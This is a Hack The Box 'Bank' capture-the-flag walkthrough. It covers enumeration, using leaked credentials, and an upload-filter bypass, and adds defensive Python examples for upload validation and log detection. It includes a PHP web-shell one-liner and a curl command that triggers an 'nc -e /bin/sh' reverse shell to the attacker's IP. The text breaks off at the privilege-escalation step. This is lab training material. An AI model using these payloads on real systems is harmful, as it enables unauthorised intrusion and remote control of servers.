🏦Bank

https://app.hackthebox.com/machines/Bank

The web server shows only the default Apache page, so the entry point is probably DNS ->

For better enumeration, I bound bank.htb to the target IP in my /etc/hosts file.

Funnily enough, when I nmap bank.htb it reports a login.php in the HTTP header.

After a quick directory brute force we find this subpage:

Now let's use the lynx tool:

lynx http://bank.htb/balance-transfer/

Lynx is a lightweight, text-based web browser commonly used in Kali Linux for anonymity, simplicity, command-line interface, and web application testing. It is particularly useful for penetration testers and security researchers due to its ability to browse the web without JavaScript, cookies, or other features that can be used to track users, and its ease of integration into automated testing workflows.

The first thing to look at is the size of the files; they are all similar.

Except one, which is clearly off ->
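To make the size check repeatable instead of eyeballing the listing, here is an added Python example (mine, not part of the original write-up) that parses an autoindex-style directory listing and flags size outliers with a median/MAD test. The listing text, file names and sizes below are constructed, and the helper names are my own.

```python
import re
import statistics

# Constructed sample of what an Apache mod_autoindex listing looks like when
# fetched with lynx or curl; file names and sizes are made up for this example.
SAMPLE_LISTING = """
<a href="0a1b2c3d.acc">0a1b2c3d.acc</a>    2018-04-12 10:42   584
<a href="1f2e3d4c.acc">1f2e3d4c.acc</a>    2018-04-12 10:42   583
<a href="2a9b8c7d.acc">2a9b8c7d.acc</a>    2018-04-12 10:42   585
<a href="3c4d5e6f.acc">3c4d5e6f.acc</a>    2018-04-12 10:42   257
<a href="4d5e6f7a.acc">4d5e6f7a.acc</a>    2018-04-12 10:42   584
<a href="5e6f7a8b.acc">5e6f7a8b.acc</a>    2018-04-12 10:42   584
"""

# One listing row: link, name, date, time, size column ("584", "1.1K", "2M").
ROW_RE = re.compile(r'<a href="([^"]+)">[^<]*</a>\s+\S+\s+\S+\s+([\d.]+[KMG]?)')

UNITS = {"": 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}


def parse_size(text: str) -> int:
    """Convert an autoindex size column ('584', '1.1K', '2M') to bytes."""
    m = re.fullmatch(r"([\d.]+)([KMG]?)", text)
    if not m:
        raise ValueError(f"unrecognised size: {text!r}")
    return int(float(m.group(1)) * UNITS[m.group(2)])


def parse_listing(html: str) -> dict:
    """Return {filename: size_in_bytes} for every file row in the listing."""
    return {name: parse_size(size) for name, size in ROW_RE.findall(html)}


def size_outliers(sizes: dict, threshold: float = 3.5) -> list:
    """Flag files whose size is more than `threshold` median absolute
    deviations away from the median size. Names come back sorted with the
    most unusual file first."""
    values = list(sizes.values())
    median = statistics.median(values)
    mad = statistics.median(abs(v - median) for v in values)
    if mad == 0:
        mad = 1.0  # every other file identical: any deviation at all counts
    scored = {name: abs(size - median) / mad for name, size in sizes.items()}
    return sorted((n for n, z in scored.items() if z > threshold),
                  key=lambda n: -scored[n])


if __name__ == "__main__":
    found = parse_listing(SAMPLE_LISTING)
    for name in size_outliers(found):
        print(f"outlier: {name} ({found[name]} bytes)")
```

With hundreds of near-identical files, the MAD test points straight at the odd one out; the threshold of 3.5 is the usual rule of thumb for that statistic.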

And with those creds we are able to bypass the login page:

After looking around the only possible path is the support button with an upload form:

To test out the upload form, let's use the following:

<?php echo (system($_GET['go'])); ?>

Obviously:

As a SOC analyst, the first-level bypass to try is a double extension ->

And that is game ->
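Why a double extension gets past a check like this, and what the server-side validation should look like instead, as an added Python example (mine, not the Bank application's code, which the page does not show): weak_check reproduces the pattern of looking only at the tail of the file name, and hardened_check is the allowlist-plus-magic-bytes replacement. Function names, the allowed types and the test names are my own assumptions.

```python
import secrets
from typing import Optional

# Allowed final extensions and the magic bytes each type must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}
# Extensions that must not appear anywhere in a name: a server-side handler
# mapping for any of them makes the file run as code. ".htb" is included
# because it is the extension that executed on this box.
EXECUTABLE = {"php", "phtml", "php3", "php4", "php5", "phar", "cgi", "htb"}


def weak_check(filename: str) -> bool:
    """The broken pattern: only the very end of the name is inspected, so
    'shell.php.jpg' and 'file.php.htb' both pass."""
    return not filename.lower().endswith(".php")


def hardened_check(filename: str, content: bytes) -> Optional[str]:
    """Return a random server-side name for an acceptable upload, or None.

    - allowlist on the final extension (nothing to bypass with a blacklist)
    - reject an executable extension anywhere earlier in the name
    - magic bytes must match the claimed type
    - the client-supplied name never touches the disk; a random name is
      used, so path separators or odd characters in it cannot matter
    """
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return None
    ext = parts[-1]
    if ext not in ALLOWED:
        return None
    if any(p in EXECUTABLE for p in parts[:-1]):
        return None
    if not content.startswith(ALLOWED[ext]):
        return None
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + bytes(16)
    for name in ("photo.jpg", "shell.php.jpg", "file.php.htb"):
        print(name, "weak:", weak_check(name),
              "hardened:", hardened_check(name, jpeg) is not None)
```

The random name is the part that closes the door for good: even if a handler mapping is later added for some extension, the attacker never controls what the stored file is called. Keeping the upload directory outside the document root, or serving it with script execution disabled, is the matching web-server-side control.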

When I try to find the file, I can't display it, for obvious reasons:

Let's try to bypass this by curling it:

I changed the file extension to .htb; I don't know why my original extension did not work for the RCE. Now let's abuse this:

curl -vsk "http://bank.htb/uploads/file.php.htb?go=nc%20-e%20/bin/sh%2010.10.14.166%205454"

I URL-encoded the command to avoid any issues with the spaces ->

Set up my listener and run it:
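From the defender's side, a request like the curl above leaves a clear trace in the web server log. This added Python example (not from the write-up) parses constructed Apache access-log lines, URL-decodes the query string, and flags the two things the page demonstrates: a multi-extension file being requested under /uploads/, and a shell-like command in a query value. The log lines are made up, and the function names and the static-extension allowlist are my own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines; timestamps and the second client IP
# are made up, the paths mirror the write-up.
SAMPLE_LOG = """\
10.10.14.166 - - [12/Apr/2018:10:51:02 +0000] "GET /uploads/file.php.htb?go=nc%20-e%20/bin/sh%2010.10.14.166%205454 HTTP/1.1" 200 12 "-" "curl/7.58.0"
10.10.14.166 - - [12/Apr/2018:10:50:40 +0000] "GET /uploads/file.php.htb?go=id HTTP/1.1" 200 54 "-" "curl/7.58.0"
10.10.14.23 - - [12/Apr/2018:10:49:00 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 48211 "http://bank.htb/support.php" "Mozilla/5.0"
10.10.14.23 - - [12/Apr/2018:10:48:10 +0000] "POST /support.php HTTP/1.1" 302 0 "http://bank.htb/support.php" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Only passive content should ever be fetched from the upload directory.
STATIC_EXT = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Shell interpreters / download tools at a token boundary, absolute /bin/
# paths, or shell metacharacters inside a decoded parameter value.
SHELL_RE = re.compile(
    r"(?:^|[\s;|&`$(])(?:nc|ncat|bash|sh|dash|python\d*|perl|wget|curl)(?:\s|$)"
    r"|/bin/|[;|&`$]"
)


def parse_line(line: str):
    """Split one combined-log line into ip/ts/method/path/params/status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query)  # percent-decodes every value
    return rec


def check_upload_path(path: str):
    """Flag anything under /uploads/ that is not a single static extension."""
    if not path.startswith("/uploads/"):
        return None
    exts = path.rsplit("/", 1)[-1].lower().split(".")[1:]
    if len(exts) > 1 or (exts and exts[0] not in STATIC_EXT):
        return "executable or multi-extension file under /uploads/"
    return None


def check_query(params):
    """Flag decoded query values that read like a shell command line."""
    for _, value in params:
        if SHELL_RE.search(value):
            return "shell-like query value"
    return None


def detect(log_text: str) -> list:
    """Run both checks over every line; return the hits with their reasons."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = [r for r in (check_upload_path(rec["path"]),
                               check_query(rec["params"])) if r]
        if reasons:
            findings.append({"ip": rec["ip"], "path": rec["path"],
                             "status": rec["status"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["status"], "; ".join(hit["reasons"]))
```

Decoding before matching is the important detail: the percent-encoded request would slip past a rule written for literal spaces, which is exactly the reason the command was encoded in the first place. A 200 on a multi-extension file under the upload directory is also a signal on its own, even when the query string looks harmless.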

Now let's go for root ->

Before that, let's upgrade to a better shell:

python -c 'import pty; pty.spawn("/bin/bash")'

And after a bit of enumeration ->

we find an auto-root script; it could also have been found by grepping for keywords or the like:
